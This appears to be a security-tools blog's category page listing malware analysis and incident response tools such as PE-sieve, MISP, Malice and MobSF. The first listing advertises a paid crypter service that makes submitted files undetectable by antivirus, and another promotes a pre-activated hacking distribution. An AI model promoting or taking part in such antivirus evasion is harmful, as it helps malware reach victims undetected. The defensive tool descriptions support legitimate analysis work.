PRINT
PRINT
SEND MAIL
SEND MAIL

Category: Malware Analysis

NEW TOOLS

Fud 100% services packages ready for sales

We offer a monthly Crypter service to make your files undetectable encrypted! this is how it works: You zip the files you want to encrypt and send them to our email cybersec@cybeseclabs.com then we will encrypt and make your files/file fud 100% (undetectable by any antivirus) and send them back to your email! We offer 3 packages: Standard Prenium Ultimate All those packages offer some unique futures to encrypt your file!  

Windows10

Black Window 10 v2

  Black Window Enterprise 10 Codename : Polemos Black Window 10 Enterprise is the first windows based penetration testing distribution with Linux integrated ! The system comes activated with a digital license for Windows enterprise! It supports windows apps and Linux apps, GUI and terminal apps! It comes with a tone off hacking tools plus all the tools that are included with the latest release of Cerberus Linux! It has managed to implement Cerberus os within windows. Offers the stability of a windows system…

CarbonblackCIRTKitIncident responseMalware AnalysisNEW TOOLSViper

CIRTKit – Tools For The Computer Incident Response Team

One DFIR console to rule them all. Built on top of the Viper FrameworkDocumentationPlease see the wiki for more information about CIRTKit and documentationRoadmapFuture integrationsBit9Palo Alto NetworksEnCase/FTKFuture modulesPacket Analysis (possibly Dshell)Javascript Unpacking/DeobfuscationVolatility Memory Analysis FrameworkHex Viewer/EditorScripting FrameworkAutomation is key. Scripting is key to DFIR, thus needs to be available in CIRTKitDownload CIRTKit

ElasticsearchgolangKibanaMaliceMalware AnalysisMalware ResearchNEW TOOLSScanVirusTotal

Malice – VirusTotal Wanna Be (Now With 100% More Hipster)

Malice's mission is to be a free open source version of VirusTotal that anyone can use at any scale from an independent researcher to a fortune 500 company.Try It OutDEMO: demo.malice.iousername: malicepassword: ecilamRequirementsHardware~16GB disk space~4GB RAMSoftwareDockerGetting Started (OSX)Install$ brew install maliceio/tap/maliceUsage: malice [OPTIONS] COMMAND [arg...]Open Source Malware Analysis FrameworkVersion: 0.3.11Author: blacktop - <: --debug, -D Enable debug mode [$MALICE_DEBUG] --help, -h show help --version, -v print the versionCommands: scan Scan a file watch Watch a folder lookup Look up a file hash elk Start…

FsharpMalware AnalysisNEW TOOLSReverse EngineeringRuntime InspectorShed

Shed – .NET Runtime Inspector

Shed is an application that allow to inspect the .NET runtime of a program in order to extract useful information. It can be used to inspect malicious applications in order to have a first general overview of which information are stored once that the malware is executed.Shed is able to:Inject a .NET Assembly in a remote process (both managed and un-managed)Extract all objects stored in the managed heapPrint strings stored in memorySave the snapshot of the heap in a JSON format for post-processingDump all…

MalboxesMalware AnalysisMalware ResearchNEW TOOLSPython3Virtual Machine

Malboxes – Builds Malware Analysis Windows VMs So That You Don’T Have To

Builds malware analysis Windows virtual machines so that you don’t have to.RequirementsPython 3.3+ packer: vagrant: VirtualBox or an vSphere / ESXi server Minimum specs for the build machineAt least 5 GB of RAM VT-X extensions strongly recommendedFedoradnf install ruby-devel gcc-c++ zlib-develvagrant plugin install winrm winrm-fsDebianapt install vagrant git python3-pipInstallationLinux/UnixInstall git, vagrant and packer using your distribution’s packaging tool (packer is sometimes called packer-io) pip install malboxes: sudo pip3 install git+ Note Starting with Windows 10 Hyper-V is always running below the operating…

Anti MalwareDetect MalwareLibpeconvMalware AnalysisNEW TOOLSPe AnalyzerPe DumperPe FormatPe SieveProcess AnalyzerScans

Pe-Sieve – Recognizes And Dumps A Variety Of Potentially Malicious Implants (Replaced/Injected PEs, Shellcodes, Hooks, In-Memory Patches)

PE-sieve is a light-weight tool that helps to detect malware running on the system, as well as to collect the potentially malicious material for further analysis. Recognizes and dumps variety of implants within the scanned process: replaced/injected PEs, shellcodes, hooks, and other in-memory patches.Detects inline hooks, Process Hollowing, Process Doppelgänging, Reflective DLL Injection, etc.uses library: recursive clone to get the repo together with the submodule:git clone --recursive builds*:*those builds are available for testing and they may be ahead of the official release:32-bit64-bitDownload…

Incident responseMalware AnalysisMISPNEW TOOLSThreat AnalysisThreat HuntingThreat IntelligenceThreat Intelligence PlatformThreat Sharing

MISP – Malware Information Sharing Platform and Threat Sharing

The objective of MISP is to foster the sharing of structured information within the security community and abroad. MISP provides functionalities to support the exchange of information but also the consumption of the information by Network Intrusion Detection System (NIDS), LIDS but also log analysis tools, SIEMs.MISP, is an open source software solution for collecting, storing, distributing and sharing cyber security indicators and threat about cyber security incidents analysis and malware analysis. MISP is designed by and for incident analysts, security and ICT professionals…

Malicious MacroMalware AnalysisMalware DetectionNEW TOOLSVba2Graph

Vba2Graph – Generate Call Graphs From VBA Code, For Easier Analysis Of Malicious Documents

A tool for security researchers, who waste their time analyzing malicious Office macros.Generates a VBA call graph, with potential malicious keywords highlighted.Allows for quick analysis of malicous macros, and easy understanding of the execution flow.@MalwareCantFlyFeaturesKeyword highlightingVBA Properties supportExternal function declarion supportTricky macros with "_Change" execution triggersFancy color schemes!ProsPretty fastWorks well on most malicious macros observed in the wildConsStatic (dynamicaly resolved calls would not be recognized)ExamplesExample 1:Trickbot downloader - utilizes object Resize event as initial trigger, followed by TextBox_Change triggers.Example 2:Check out the Examples folder…

GNUMacMalware AnalysisNEW TOOLSVirtual Machine

Droidefense – Advance Android Malware Analysis Framework

Droidefense (originally named atom: analysis through observation machine)* is the codename for android apps/malware analysis/reversing tool. It was built focused on security issues and tricks that malware researcher have on they every day work. For those situations on where the malware has anti-analysis routines, Droidefense attemps to bypass them in order to get to the code and 'bad boy' routine. Sometimes those techniques can be virtual machine detection, emulator detection, self certificate checking, pipes detection. tracer pid check, and so on.Droidefense uses an innovative…

Android SecurityARMBinary AnalysisDynamic AnalysisiOSiOS SecurityMalware AnalysisMobile SecurityMobile Security FrameworkMobSFNEW TOOLSStatic AnalysisWindows Mobile Security

MobSF (Mobile Security Framework) v1.0 – Mobile (Android/iOS) Automated Pen-Testing Framework

Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing framework capable of performing static, dynamic and malware analysis. It can be used for effective and fast security analysis of Android, iOS and Windows mobile applications and support both binaries (APK, IPA & APPX ) and zipped source code. MobSF can do dynamic application testing at runtime for Android apps and has Web API fuzzing capabilities powered by CapFuzz, a Web API specific security scanner. MobSF is designed to make your CI/CD…